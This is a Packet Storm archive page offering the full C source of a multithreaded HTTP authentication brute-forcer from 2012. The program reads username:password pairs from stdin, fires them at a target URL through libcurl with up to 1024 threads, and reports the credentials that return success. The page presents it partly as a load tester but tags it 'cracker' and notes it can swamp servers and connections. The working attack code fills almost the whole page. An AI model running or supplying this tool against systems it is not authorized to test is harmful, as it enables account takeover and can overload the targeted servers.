what you don't know can hurt you

HTTP Brute Force

HTTP Brute Force
Posted Jan 31, 2012
Authored by James Stevenson | Site stev.org

This is a small application built to test the performance of a http authentication system using a lot of concurrent connections. It can also be used to try lots of password against a http server. It is capable of using up to 1024 (or more using multiple processes). However with this amount it is capable or reducing internet connections to a crawl and also greatly increasing the load on the server.

tags | tool, web, cracker
MD5 | c4128ea1e60ebf55e64c5ab94a600608

HTTP Brute Force

Change Mirror Download
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Library General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* $Id: brute-http.c,v 1.1 2012/01/30 22:28:55 james.stevenson Exp $
*
* Author:
* NAME: James Stevenson
* WWW: http://www.stev.org
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <getopt.h>
#include <string.h>
#include <pthread.h>

#include <curl/curl.h>

int verbose = 0;
int total = 0;
volatile int quit = 0;

pthread_mutex_t mutex_pass = PTHREAD_MUTEX_INITIALIZER;

struct args {
char *url;
};

void print_help(FILE *fp, char *app) {
fprintf(fp, "Usage: %s [<options>]\n", app);
fprintf(fp, "\n");
fprintf(fp, " -h Print this help and exit\n");
fprintf(fp, " -v Verbose. Repeat for more info\n");
fprintf(fp, " -u <url> url to try\n");
fprintf(fp, " -n <num> number of threads to use\n");
fprintf(fp, "\n");
fprintf(fp, "Note: usernames / password will be read from stdin\n");
fprintf(fp, "The format for this is username:password\n");
fprintf(fp, "\n");
}

void dump(void *ptr, size_t size, size_t nmemb, void *stream) {

}

int try(char *url, char *username, char *password) {
CURL *req = NULL;
CURLcode res;
long status = 0;

req = curl_easy_init();
if (!req) {
printf("curl_easy_init: Failed\n");
exit(EXIT_FAILURE);
}

curl_easy_setopt(req, CURLOPT_URL, url);
curl_easy_setopt(req, CURLOPT_WRITEFUNCTION, dump);
curl_easy_setopt(req, CURLOPT_USERNAME, username);
curl_easy_setopt(req, CURLOPT_PASSWORD, password);

res = curl_easy_perform(req);

res = curl_easy_getinfo(req, CURLINFO_RESPONSE_CODE, &status);

curl_easy_cleanup(req);

printf("Tried: %s:%s Got %ld\n", username, password, status);

switch (status) {
case 0:
printf("Request Failed For: %s:%s Code: %ld\n", username, password, status);
return 0;
case 200:
return 1;
case 302:
return 1; /* redirect means success */
case 401:
return 0;
default:
printf("Tried: %s:%s Got %ld\n", username, password, status);
printf("Unknown Status Code: %ld\n", status);
exit(EXIT_SUCCESS);
return 0;
}
}

int getpassword(char **buf, size_t *buflen, char **username, char **password) {

pthread_mutex_lock(&mutex_pass);

if (getline(buf, buflen, stdin) >= 0) {
pthread_mutex_unlock(&mutex_pass);
char *tmp = strchr(*buf, ':');
if (tmp == 0 || tmp[1] == 0)
return 0;
*username = *buf;
*tmp = 0;
tmp++;
*password = tmp;
tmp = strchr(*password, '\n');
if (tmp != 0)
*tmp = 0;
return 1;
}

pthread_mutex_unlock(&mutex_pass);
return 0;
}

void *run(void *p) {
struct args *a = (struct args *) p;
char *buf = 0;
size_t buflen = 0;
char *user = 0;
char *pass = 0;

while(quit == 0) {
if (getpassword(&buf, &buflen, &user, &pass) == 0)
goto free; /* we ran out of passwords */

if (try(a->url, user, pass)) {
printf("Success! Username: %s Password: %s\n", user, pass);
quit = 1;
goto free;
}
}

free:
if (buf != NULL)
free(buf);

pthread_exit(NULL);
return NULL;
}

int main(int argc, char **argv) {
struct args args;
pthread_t *thd;
pthread_attr_t attr;
int nthreads = 1;
int i = 0;
int c;

memset(&args, 0, sizeof(args));

while( (c = getopt(argc, argv, "hn:vu:")) != -1) {
switch(c) {
case 'h':
print_help(stdout, argv[0]);
exit(EXIT_SUCCESS);
break;
case 'n':
nthreads = atoi(optarg);
break;
case 'u':
args.url = optarg;
break;
case 'v':
verbose++;
break;
}
}

curl_global_init(CURL_GLOBAL_ALL);

if (args.url == NULL) {
print_help(stdout, argv[0]);
exit(EXIT_FAILURE);
}

thd = malloc(nthreads * sizeof(*thd));
if (!thd) {
perror("malloc");
exit(EXIT_FAILURE);
}

if (pthread_attr_init(&attr) != 0) {
perror("pthread_attr_init");
exit(EXIT_FAILURE);
}

if (pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE) != 0) {
perror("pthread_attr_setdetachstate");
exit(EXIT_FAILURE);
}

for(i=0;i<nthreads;i++) {
if (pthread_create(&thd[i], NULL, run, &args) != 0) {
perror("pthread_create");
exit(EXIT_FAILURE);
}
}

for(i=0;i<nthreads;i++) {
if (pthread_join(thd[i], NULL) != 0) {
perror("pthread_join");
exit(EXIT_FAILURE);
}
}

pthread_attr_destroy(&attr);

free(thd);

curl_global_cleanup();

return EXIT_SUCCESS;
}


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    22 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    1 Files
  • 17
    Nov 17th
    3 Files
  • 18
    Nov 18th
    22 Files
  • 19
    Nov 19th
    17 Files
  • 20
    Nov 20th
    15 Files
  • 21
    Nov 21st
    10 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close